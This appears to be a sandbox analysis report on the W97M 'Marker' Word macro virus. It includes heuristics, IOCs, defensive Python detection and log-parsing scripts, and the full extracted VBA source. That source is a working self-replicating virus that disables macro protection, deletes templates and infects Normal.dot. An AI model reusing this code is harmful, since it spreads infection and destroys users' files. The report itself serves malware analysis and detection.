Verdict: MALICIOUS
Risk Score: 270
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1553.005 Mark-of-the-Web Bypass
T1190 Exploit Public-Facing Application
T1071.001 Web Protocols
Of these mappings, only T1059.005 is evidenced by the extracted macro: the script contains no network, download or Mark-of-the-Web handling code, and no public-facing application is involved. Treat the other three as analyzer noise unless a separate finding supports them.
The sample is a Microsoft Word document carrying a W97M-style macro virus (ClamAV: Doc.Trojan.Marker). Its Document_Open handler calls Document_Close, which disables Word's macro-virus warning (Options.VirusProtection = False), deletes *.doc and *.dot files from the Word startup path (Options.DefaultFilePath(8), wdStartupPath), suppresses Ctrl+Break (EnableCancelKey = wdCancelDisabled), rewrites the user identity fields, and then replicates: it copies the ThisDocument module between the active document and Normal.dot through the VBE object model (VBProject.VBComponents, CodeModule.DeleteLines / AddFromString), using the Marker constant to avoid re-infecting a module that already carries it. On every copy it appends a comment trailer with a timestamp, Application.UserName and Application.UserAddress, so the trailer is an infection log of every host the document passed through. The payload (ShowMe) is intended to run once per host, guarded by a registry value written with System.PrivateProfileString, and again on Sundays (Weekday(Now()) = 1): it writes %SystemRoot%\Jon.html and sets it as the Internet Explorer desktop wallpaper via the registry. There is no downloader or dropper logic and no network code; the only URL in the file is the benign DrawingML schema namespace. IOCs from the script: the e-mail addresses JonMMx2000@yahoo.com and jonthebest@hotbot.com, the user name "JonMMx 2000" and initials "MeMeX", the Marker string "<- this is a marker! by jonhehehe TheBest-versi212x", the file Jon.html under the system root, and the value "LogData in" under HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info.
Heuristics (7)
- ClamAV detection, critical, CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Marker-35
- VBA macros detected, medium, 2 related findings, OLE_VBA_MACROS: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering, critical, OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False
- Document_Open macro, low, OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: Private Sub Document_Open()
- Heap-spray pattern detected, high, SC_HEAP_SPRAY: Repeated 0x04 bytes found. Attempted x86 opcode disassembly: 0009093D..0009099B, 48 consecutive "0404 add al, 4".
- NOP-equivalent sled detected, medium, SC_NOP_EQUIV_SLED: Long run of 0x40 bytes. Attempted x86 opcode disassembly: 00072130..00072172, 67 consecutive "40 inc eax", followed by 00072173 41 inc ecx; 00072174 5f pop edi; 00072175 af scasd eax, dword ptr es:[edi]; 00072176 a861 test al, 0x61; 00072178 a966763cf6 test eax, 0xf63c7666; 0007217D 2426 and al, 0x26; 0007217F c6 .byte 0xc6; 00072180 e6b6 out 0xb6, al; 00072182 28a10bf90864 sub byte ptr [ecx + 0x6408f90b], ah; 00072189 23bc31bc709884 and edi, dword ptr [ecx + esi - 0x7b678f44]
  Caveat on the two shellcode heuristics: a run of identical bytes inside a Word binary stream is not evidence of an exploit on its own. Neither finding identifies a trigger (no vulnerable parser path, no pointer into the run), and the bytes following the 0x40 run disassemble to nonsense. The verdict rests on the macro behaviour, which needs no exploit, only a user who enables macros.
- Embedded URL, info, EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body); this is the DrawingML schema namespace and is expected in Office files.
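The replication heuristic above describes the pattern in prose. The Python below, added here as an example and not part of the analyzer or of oletools, runs the same check over VBA source text such as the carved macros.bas, and pulls out the IOC strings an analyst would carry into a report. The indicator names, the regexes and the verdict wording are this example's own choices; SAMPLE is a hand-trimmed excerpt of the macro shown on this page.

```python
"""Score VBA source for the W97M-style self-replication pattern that the
OLE_VBA_MACRO_VIRUS_REPLICATION heuristic describes, and pull basic IOCs out of
it. Added example for this report, not the analyzer's or oletools' own code;
works on any text olevba extracts. SAMPLE is a hand-trimmed excerpt of the
macros.bas shown on this page."""
import re
import sys

# One regex per indicator. Self-replication needs a handle on another VBProject
# (ActiveDocument / NormalTemplate) plus a CodeModule write; tampering with the
# macro-virus warning and wiping startup templates are separate flags.
INDICATORS = {
    "code_rewrite": re.compile(r"\.CodeModule\.(AddFromString|InsertLines|DeleteLines|ReplaceLine)\b", re.I),
    "vbproject_access": re.compile(r"\.VBProject\.VBComponents\b", re.I),
    "normal_template": re.compile(r"\bNormalTemplate\.(VBProject|Save)\b", re.I),
    "virusprotection_off": re.compile(r"Options\.VirusProtection\s*=\s*False", re.I),
    "autoexec_handler": re.compile(r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b", re.I),
    "kills_templates": re.compile(r"\bKill\b.*\.(doc|dot)\b", re.I),
}

IOC_PATTERNS = {
    "emails": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    "registry_keys": re.compile(r"HKEY_[A-Z_]+\\[^\"']+"),
    # quoted literals that end in a document, script or web extension
    "file_names": re.compile(r'"(\\?[\w*.\-]+\.(?:html?|docm?|dotm?|vbs|exe|bat))"', re.I),
}

# Excerpt of the macro shown on this page (constructed test input).
SAMPLE = r'''Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
    Document_Close
End Sub
Private Sub Document_Close()
    On Error Resume Next
    Kill Options.DefaultFilePath(8) & "\*.doc"
    Kill Options.DefaultFilePath(8) & "\*.dot"
    Options.VirusProtection = False
    Application.UserAddress = "JonMMx2000@yahoo.com"
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString Jon
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
    Open RootsyS & "\Jon.html" For Output As #1
End Sub
'''


def scan_vba(src):
    """Return {indicator: (line_no, line)} for the first line each indicator hits."""
    hits = {}
    for n, line in enumerate(src.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if name not in hits and rx.search(line):
                hits[name] = (n, line.strip())
    return hits


def classify(hits):
    """Map indicator hits to a verdict in the report's severity vocabulary."""
    names = set(hits)
    if "code_rewrite" in names and names & {"vbproject_access", "normal_template"}:
        return "critical: macro-virus self-replication"
    if "virusprotection_off" in names:
        return "critical: macro-protection tampering"
    if names:
        return "suspicious: auto-exec macro or template access"
    return "no replication indicators"


def extract_iocs(src):
    """Sorted, de-duplicated IOC strings per category."""
    return {kind: sorted(set(rx.findall(src))) for kind, rx in IOC_PATTERNS.items()}


if __name__ == "__main__":
    # usage: python scan_vba.py [macros.bas]; defaults to the embedded excerpt
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    hits = scan_vba(src)
    print(classify(hits))
    for name, (n, line) in hits.items():
        print(f"  {name:<20} line {n}: {line}")
    for kind, values in extract_iocs(src).items():
        print(f"  {kind}: {values}")
```

The verdict deliberately requires both a VBProject handle and a CodeModule write before calling something self-replicating; a document that only touches NormalTemplate, or only has a Document_Open handler, is reported as suspicious rather than critical, which keeps legitimate template add-ins from tripping the rule.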
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13021 bytes | 27e2957f2d7320fe4d3bbe00a7829fd6f8c7e77a46c9412efe59386a46e09cc9 | ClamAV: Doc.Trojan.Marker-13 | unlikely |
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Seline, Where are you dear
Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim Jon, Users, LogData, LogFile As String
On Error Resume Next
AddIns.Unload True
Kill Options.DefaultFilePath(8) & "\*.doc"
Kill Options.DefaultFilePath(8) & "\*.dot"
Options.VirusProtection = False
Application.UserName = "JonMMx 2000"
Application.UserInitials = "MeMeX"
Application.UserAddress = "JonMMx2000@yahoo.com"
Application.EnableCancelKey = wdCancelDisabled
GoSub InsertIon
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
"LogData in") = False) Then GoSub LoggingIn
If Weekday(Now()) = 1 Then GoSub ShowMe
GoTo Finish
InsertIon:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DI Then
NTS = NormalTemplate.Saved
Jon = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
For i = 1 To Len(Application.UserAddress)
If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then
Users = Users & Mid(Application.UserAddress, i, 1)
End If
Else
Users = Users & Chr(13) & " '"
End If
Next
Jon = Jon & Chr(13) & _
"' " & Format(Time, "hh:mm:sc AMPM-") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & Users & Chr(13) & Chr(13) & " "
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString Jon
If NTS Then NormalTemplate.Save
End If
If NTI Then
DS = ActiveDocument.Saved
Jon = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString Jon
If DS Then ActiveDocument.Save
End If
End If
Return
LoggingIn:
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
GoSub ShowMe
Return
ShowMe:
Dim RootsyS As String
On Error Resume Next
RootsyS = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
Open RootsyS & "\Jon.html" For Output As #1
Print #1, "<Html><head><title>Welcome to Destroyer of the last Manillenium JontheBEST</title></head><Body><body bgcolor = '#FFF212' >"
Print #1, "<center><p align='center'><font color='#800000'size='25'><strong>a Poet For My Dear Love</strong></font></p>"
Print #1, "<p align='center'><font color='#000000' size='6'><strong><a href='mailto:iamwaiting@yahoo.com'>Dear Iin</a></strong></font> </p>"
Print #1, "<font normal></center>To the very best that happen in mylife<p>"
Print #1, "<p>Long ago and in my mind, I can see your face lonely and lost in time "
Print #1, "<p>You were gone since yester month But the memories, never would dissapear"
Print #1, "<p>I think of you, I THINK OF YOU.<p>"
Print #1, "<p>Yes it's true I can pretend. But the paint of blue, keep beat me till the end."
Print #1, "<p>Yes it's hard to understand. Why you leaving me and all we dreaming on "
Print #1, "<p>Dear Iin, I close my eyes and see your face. That's all I have to do to be with you. "
Print #1, "<p>Dear Iin, altough I can not touch your face. I know what I can do to be with you "
Print #1, "<p>Long ago so faraway. But the light of blue, still living with me today."
Print #1, "<p>You were gone since yester month. But the memories never would dissapear."
Print #1, "<center><font color='#245505' size='6'><strong><p>Speed Hari</strong></font></center></Body></html>"
Close #1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General", "Wallpaper") = RootsyS & "\Jon.html"
Return
Finish:
End Sub
'Logfile -->
' 06:14:2518:14:25 -Kamis, 22 Jul 1999
' JonMMx 2000
' jonthebest@hotbot.com
' 09:07:259:07:25 -Sabtu, 24 Jun 2017
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:13:3712:13:37 AM AM-Saturday, 14 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:55:459:55:45 AM AM-Wednesday, 25 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:03:2112:03:21 PM PM-Friday, 27 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:47:402:47:40 PM PM-Sunday, 29 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:37:562:37:56 AM AM-Monday, 30 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:29:4310:29:43 PM PM-Wednesday, 1 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:28:249:28:24 AM AM-Sunday, 5 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:17:912:17:09 PM PM-Monday, 13 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:48:159:48:15 AM AM-Sunday, 26 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:34:5808:34:58 -Wednesday, 6 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:09:535:09:53 PM PM-Monday, 18 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:55:3110:55:31 AM AM-Wednesday, 20 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:57:5211:57:52 AM AM-Saturday, 6 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:51:302:51:03 PM PM-Monday, 29 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:24:1411:24:14 AM AM-Tuesday, 11 Jan 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:57:3103:57:31 PM PM-Thursday, 13 Jan 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:26:2203:26:22 下午 下午-Thursday, 17 Feb 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:55:178:55:17 AM-Tuesday, 21 Mar 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:15:509:15:50 AM-Thursday, 30 Mar 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:43:1910:43:19 AM-Monday, 22 May 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:36:388:36:38 AM-Wednesday, 31 May 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:33:210:33:02 AM-Saturday, 17 Jun 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:45:4612:45:46 PM-Wednesday, 26 Jul 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:12:4714:12:47 PM-Tuesday, 26 Sep 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:07:2715:07:27 PM-Tuesday, 14 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:04:3319:04:33 PM-Thursday, 16 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:29:1818:29:18 PM-Wednesday, 22 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:26:2310:26:23 AM-Saturday, 25 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 07:08:527:08:52 AM-Sunday, 26 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:15:508:15:50 AM-Friday, 22 Dec 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:50:158:50:15 AM-Wednesday, 7 Feb 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:36:59:36:05 AM-Thursday, 8 Feb 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:35:3403:35:34 下午 下午-Saturday, 24 Feb 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:43:1212:43:12 下午 下午-Saturday, 17 Mar 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:40:5910:40:59 上午 上午-Wednesday, 18 Apr 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:51:5702:51:57 下午 下午-Friday, 20 Apr 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:30:5801:30:58 下午 下午-Tuesday, 22 May 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:18:5812:18:58 下午 下午-Saturday, 16 Jun 2001
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:16:722:16:07 下午-Sunday, 27 Feb 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:02:1515:02:15 下午-Wednesday, 9 Mar 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:54:2517:54:25 下午-Thursday, 17 Mar 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:37:1015:37:10 下午-Tuesday, 29 Mar 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:53:5917:53:59 下午-Thursday, 14 Apr 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:21:3214:21:32 下午-Friday, 13 May 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:49:529:49:52 上午-Tuesday, 28 Jun 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:48:158:48:15 上午-Friday, 15 Jul 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:20:148:20:14 上午-Thursday, 8 Sep 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:04:3811:04:38 上午-Sunday, 18 Sep 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:11:1317:11:13 下午-Thursday, 20 Oct 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 05:45:3817:45:38 下午-Saturday, 29 Oct 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:50:218:50:21 上午-Monday, 7 Nov 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:21:2318:21:23 下午-Friday, 18 Nov 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:06:409:06:40 上午-Saturday, 17 Dec 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:29:239:29:23 上午-Saturday, 14 Jan 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:22:3215:22:32 下午-Sunday, 1 Apr 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:33:5913:33:59 下午-Tuesday, 5 Jun 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:14:3523:14:35 下午-Tuesday, 14 Aug 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:06:3310:06:33 上午-Monday, 27 Aug 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:19:1010:19:10 上午-Wednesday, 5 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:39:4513:39:45 下午-Friday, 7 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:06:214:06:02 下午-Friday, 7 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:13:3814:13:38 下午-Monday, 17 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:02:2214:02:22 下午-Monday, 8 Oct 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 01:32:113:32:01 下午-Wednesday, 10 Oct 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:46:409:46:40 上午-Thursday, 6 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:52:1118:52:11 下午-Thursday, 13 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:34:5510:34:55 上午-Thursday, 20 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:19:339:19:33 上午-Tuesday, 25 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:03:5512:03:55 下午-Thursday, 27 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:19:5815:19:58 下午-Monday, 28 Jan 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:32:1611:32:16 上午-Tuesday, 29 Jan 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:30:2010:30:20 上午-Friday, 12 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:26:148:26:14 上午-Wednesday, 24 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:00:368:00:36 上午-Thursday, 25 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:58:3614:58:36 下午-Friday, 26 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:24:111:24:01 上午-Sunday, 28 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:32:5916:32:59 下午-Sunday, 26 Jan 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 08:47:168:47:16 上午-Monday, 17 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 04:39:2516:39:25 下午-Monday, 17 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 02:06:814:06:08 下午-Thursday, 20 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 06:21:3118:21:31 下午-Thursday, 20 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:57:3812:57:38 下午-Tuesday, 15 Apr 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 11:55:1011:55:10 上午-Wednesday, 4 Jun 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:01:4610:01:46 上午-Friday, 25 Jul 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:42:4710:42:47 上午-Thursday, 13 Nov 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 09:07:5409:07:54 AM-Monday, 29 Dec 2014
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:57:3422:57:34 下午-Tuesday, 27 Jan 2015
' JonMMx 2000
' JonMMx2000@yahoo.com
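The comment trailer above is written by the replication routine as `"' " & Format(Time, "hh:mm:sc AMPM-") & Format(Date, "dddd, d mmm yyyy")`, followed by Application.UserName and Application.UserAddress. The `c` in the time format re-emits the time in the infected host's locale, which is why every entry shows the hour and minute twice with the seconds glued to the second hour, and why the AM/PM token is sometimes doubled, absent (24-hour locales), or written as 上午/下午. The Python below, added here as an example and not part of the analyzer, turns that trailer into a timeline: it recovers the 24-hour clock by picking the split of the glued digits that keeps seconds below 60 and agrees with the 12-hour field, and cross-checks English day names against the parsed date. SAMPLE_LOG is a hand-picked subset of the entries shown on this page; month abbreviations are assumed English, as they are throughout this trailer.

```python
"""Rebuild the replication timeline from the comment trailer that the Marker
macro appends to itself (the "'Logfile -->" block above). Added example for
this report, not analyzer code. SAMPLE_LOG is a subset of the page's entries."""
import re
from datetime import datetime

SAMPLE_LOG = """\
'Logfile -->
' 06:14:2518:14:25 -Kamis, 22 Jul 1999
' JonMMx 2000
' jonthebest@hotbot.com
' 09:07:259:07:25 -Sabtu, 24 Jun 2017
' JonMMx 2000
' JonMMx2000@yahoo.com
' 12:13:3712:13:37 AM AM-Saturday, 14 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com
' 03:26:2203:26:22 下午 下午-Thursday, 17 Feb 2000
' JonMMx 2000
' JonMMx2000@yahoo.com
' 10:16:722:16:07 下午-Sunday, 27 Feb 2011
' JonMMx 2000
' JonMMx2000@yahoo.com
"""

MONTHS = {m: i for i, m in enumerate("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}
EN_DAYS = "Monday Tuesday Wednesday Thursday Friday Saturday Sunday".split()
PM, AM = {"PM", "下午"}, {"AM", "上午"}

# Format(Time, "hh:mm:sc AMPM-") emits hh:mm, 1-2 digit seconds, then ('c') the
# locale time again and an optional AM/PM token, so the seconds and the second
# hour arrive glued together ("2518" = seconds 25 + hour 18).
STAMP = re.compile(
    r"^'\s*(?P<hh>\d{2}):(?P<mm>\d{2}):(?P<glued>\d+):\d{2}:(?P<ss>\d{2})(?P<tail>[^-]*)-\s*"
    r"(?P<day>[^,]+),\s*(?P<d>\d{1,2})\s+(?P<mon>[A-Za-z]{3})\s+(?P<y>\d{4})\s*$")


def recover_hour(hh, glued, tail):
    """Split the glued digits so seconds <= 59 and the locale hour agrees with
    the 12-hour field mod 12, then apply any AM/PM token. Returns (hour24, ok)."""
    hh = int(hh)
    for k in (1, 2):
        sec, hr = glued[:k], glued[k:]
        if sec and hr and int(sec) <= 59 and int(hr) <= 23 and int(hr) % 12 == hh % 12:
            hour, ok = int(hr), True
            break
    else:
        hour, ok = hh, False          # no consistent split: keep the 12-hour field
    tok = next((t for t in tail.split() if t in PM | AM), None)
    if tok in PM and hour < 12:
        hour += 12
    elif tok in AM and hour == 12:
        hour = 0
    return hour, ok


def parse_log(text):
    """One record per three-line entry: timestamp, Application.UserName, UserAddress."""
    lines = text.splitlines()
    records = []
    for i, line in enumerate(lines):
        m = STAMP.match(line)
        if not m or i + 2 >= len(lines):
            continue
        hour, ok = recover_hour(m["hh"], m["glued"], m["tail"])
        when = datetime(int(m["y"]), MONTHS[m["mon"].title()], int(m["d"]),
                        hour, int(m["mm"]), int(m["ss"]))
        day = m["day"].strip()
        records.append({
            "when": when,
            # English day names can be cross-checked against the parsed date;
            # other locales (Kamis, Sabtu) are accepted as written
            "weekday_ok": day not in EN_DAYS or EN_DAYS[when.weekday()] == day,
            "hour_recovered": ok,
            "user": lines[i + 1].lstrip("' ").strip(),
            "address": lines[i + 2].lstrip("' ").strip(),
        })
    return records


def summarize(records):
    """The facts an analyst carries into a report."""
    whens = [r["when"] for r in records]
    return {
        "count": len(records),
        "first": min(whens),
        "last": max(whens),
        "addresses": sorted({r["address"] for r in records}),
        # entries older than their predecessor: the trailer is append-ordered
        # and trusts each infected host's clock
        "out_of_order": sum(1 for a, b in zip(whens, whens[1:]) if b < a),
        "bad_weekday": sum(1 for r in records if not r["weekday_ok"]),
    }


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for r in sorted(recs, key=lambda r: r["when"]):
        print(r["when"].isoformat(), r["user"], r["address"], sep="  ")
    print(summarize(recs))
```

Run it over the full trailer by pasting the comment block into SAMPLE_LOG or reading it from the carved macros.bas. Two of its outputs matter forensically: the trailer is in append order, so an entry dated later than its successor (the 2017 record sitting second here) reflects the clock of whichever host wrote it, not the order of infection; and a non-English day name or AM/PM token is a locale fingerprint of that host.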